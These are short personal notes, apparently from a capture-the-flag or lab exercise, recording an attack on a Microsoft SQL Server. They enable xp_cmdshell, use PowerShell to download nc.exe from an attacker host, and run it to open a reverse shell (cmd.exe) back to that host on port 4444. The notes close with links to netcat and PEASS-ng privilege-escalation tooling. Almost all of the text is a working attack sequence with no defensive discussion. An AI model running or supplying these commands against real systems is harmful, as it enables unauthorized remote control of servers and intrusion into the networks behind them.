enable_xp_cmdshell;
RECONFIGURE;
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.15.82/nc.exe -outfile nc.exe"
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc.exe -e cmd.exe 10.10.15.82 4444"
histtoryはここにある
https://github.com/diegocr/netcat
https://github.com/carlospolop/PEASS-ng/releases/tag/20220508